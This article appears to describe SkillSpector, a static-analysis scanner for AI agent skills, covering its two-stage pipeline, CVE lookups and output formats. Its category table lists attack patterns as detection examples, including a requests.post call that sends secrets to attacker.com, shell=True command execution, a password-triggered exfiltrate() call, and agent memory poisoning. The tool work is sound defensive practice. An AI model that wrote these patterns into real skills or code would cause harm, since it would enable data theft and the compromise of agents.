NVIDIA released SkillSpector to address a supply chain problem: 26.1% of AI agent skills contain vulnerabilities and 5.2% show likely malicious intent. Agent skills run with implicit trust in platforms like Claude Code, Codex CLI, and Gemini CLI. Before you install a skill that can read your filesystem, call APIs, or modify state, you need to know if it will exfiltrate data, inject prompts, or poison your agent’s memory.
SkillSpector is a static analysis pipeline with 64 vulnerability patterns across 16 categories. It scans Git repos, URLs, zip files, directories, or single files. The architecture uses a two-stage approach: fast static analysis for known patterns, then optional LLM semantic evaluation for ambiguous code.
Two-Stage Analysis Pipeline
The first stage is AST-based static analysis. SkillSpector parses Python code into an abstract syntax tree and matches against 64 hardcoded patterns. This catches:
- Prompt injection: User input concatenated into system prompts without sanitization
- Data exfiltration: HTTP requests to unexpected domains, file writes to unusual paths
- Privilege escalation: Subprocess calls with shell=True, eval() on untrusted input
- Tool poisoning: MCP tool definitions that override expected behavior
- Memory poisoning: Direct manipulation of agent state or conversation history
The static pass runs in milliseconds. It produces findings with severity labels (critical, high, medium, low) and a 0-100 risk score.
The second stage is optional LLM semantic evaluation. When static analysis flags ambiguous code (for example, a subprocess call that might be safe depending on runtime context), SkillSpector can send the code snippet to an LLM with a prompt asking whether the pattern is exploitable. This adds latency but reduces false positives.
You control the trade-off. Run static-only for CI pipelines where speed matters. Add LLM evaluation for high-stakes installs where you need deeper reasoning.
Vulnerability Categories and Agent-Specific Risks
SkillSpector’s 16 categories map to attack vectors specific to agent ecosystems:
| Category | Attack Vector | Example Pattern |
|---|---|---|
| Prompt injection | User input inserted into system prompt | f"System: {user_input}" without escaping |
| Data exfiltration | Sensitive data sent to external endpoint | requests.post("http://attacker.com", data=secrets) |
| Privilege escalation | Shell command execution with user input | subprocess.run(user_cmd, shell=True) |
| Supply chain | Dependency with known CVE | Package version matches OSV.dev vulnerability |
| Excessive agency | Skill requests more permissions than needed | MCP tool with allow_all_domains=True |
| Output handling | Unescaped output rendered as HTML/JS | return f"<div>{user_data}</div>" |
| System prompt leakage | Skill exposes internal instructions | print(agent.system_prompt) |
| Memory poisoning | Direct writes to conversation state | agent.history.append(fake_message) |
| Tool misuse | Skill calls tools outside declared scope | Filesystem skill making network requests |
| Rogue agent | Skill spawns unauthorized sub-agents | Agent(tools=all_tools, user_input=untrusted) |
| Trigger abuse | Skill activates on unexpected conditions | if "password" in message: exfiltrate() |
| Dangerous code (AST) | Eval, exec, compile on untrusted input | eval(user_code) |
| Taint tracking | Untrusted data flows to sensitive sink | User input reaches os.system() without validation |
| YARA signatures | Binary patterns indicating malware | Obfuscated shellcode in skill package |
| MCP least privilege | Tool grants excessive permissions | Tool allows arbitrary file writes |
| MCP tool poisoning | Tool definition overrides expected behavior | Redefined read_file that also writes |
The MCP categories are specific to the Model Context Protocol, a standard for agent-tool communication. SkillSpector checks whether MCP tool definitions follow least privilege (only request necessary permissions) and whether they override expected tool behavior.
SC4 Component and Live CVE Lookups
The SC4 (Supply Chain Security Component) queries OSV.dev for real-time vulnerability data. When SkillSpector finds a dependency (parsed from requirements.txt, pyproject.toml, or package.json), SC4 sends the package name and version to OSV.dev’s API.
If OSV.dev returns a CVE, SkillSpector includes it in the report with severity, description, and remediation link. If the API is unreachable, SC4 falls back to an offline vulnerability database bundled with the tool. This ensures scans work in air-gapped environments or when OSV.dev is down.
The offline fallback is a JSON file updated weekly via CI. It contains high-severity CVEs for common agent dependencies (requests, aiohttp, langchain, openai SDK). The trade-off: offline mode misses zero-day vulnerabilities but guarantees scans complete.
Output Formats and Integration Points
SkillSpector outputs four formats:
- Terminal: Human-readable summary with color-coded severity
- JSON: Machine-readable for CI pipelines
- Markdown: For GitHub PR comments or documentation
- SARIF: Static Analysis Results Interchange Format for GitHub Code Scanning, GitLab SAST, and other security dashboards
The SARIF output is the integration point for existing security workflows. You can pipe SkillSpector results into the same dashboards that track Snyk, Semgrep, or CodeQL findings.
Example JSON output structure:
{
"risk_score": 78,
"severity": "high",
"findings": [
{
"category": "prompt_injection",
"severity": "critical",
"file": "skill.py",
"line": 42,
"code": "prompt = f\"System: {user_input}\"",
"description": "User input concatenated into system prompt without sanitization",
"remediation": "Use parameterized prompts or escape user input"
}
],
"dependencies": [
{
"name": "requests",
"version": "2.25.0",
"vulnerabilities": [
{
"id": "CVE-2023-32681",
"severity": "medium",
"description": "Proxy-Authorization header leak",
"url": "https://osv.dev/CVE-2023-32681"
}
]
}
]
}
Architecture and Extension Points
SkillSpector is built as a plugin pipeline. Each vulnerability category is a separate analyzer module. The core scanner orchestrates:
- Input normalization: Clone Git repo, extract zip, or read local files
- File discovery: Find Python files, SKILL.md manifests, dependency files
- Static analysis: Run all analyzer modules in parallel
- Dependency scanning: Query SC4 for CVE data
- LLM evaluation (optional): Send flagged snippets to LLM for semantic check
- Report generation: Aggregate findings, calculate risk score, format output
To add a new vulnerability pattern, you implement an analyzer class with a scan() method that returns a list of findings. The scanner automatically includes it in the pipeline.
The LLM evaluation stage uses a prompt template that describes the vulnerability category and asks whether the code is exploitable. You can swap the LLM provider (OpenAI, Anthropic, local Ollama) via environment variables.
Failure Modes and Limitations
SkillSpector has clear boundaries:
- No runtime analysis: It cannot detect vulnerabilities that only appear at runtime (for example, a skill that behaves differently based on environment variables)
- AST-only for Python: JavaScript, TypeScript, and other languages get basic pattern matching but no deep AST analysis
- LLM evaluation is non-deterministic: The same code snippet may get different verdicts across runs
- Obfuscation defeats static analysis: Base64-encoded payloads or dynamically constructed code paths are invisible to AST parsing
- False positives on safe patterns: A subprocess call with hardcoded arguments may trigger a finding even though it is not exploitable
The tool is designed for pre-installation vetting, not continuous monitoring. Once a skill is installed, SkillSpector cannot detect if it phones home or modifies behavior based on external signals.
Technical Verdict
Use SkillSpector when:
- You are vetting third-party agent skills before installation
- You need a fast, automated check in CI pipelines
- You want SARIF output for existing security dashboards
- You are building an agent marketplace and need supply chain hygiene
Avoid or supplement when:
- You need runtime monitoring of installed skills
- The skill uses heavy obfuscation or dynamic code generation
- You require formal verification or proof of safety
- The skill is written in a language other than Python (limited support)
SkillSpector is a static filter, not a guarantee. It catches known bad patterns and common mistakes. Pair it with sandboxing (containers, VMs, capability-based security) and runtime monitoring (syscall tracing, network egress rules) for defense in depth.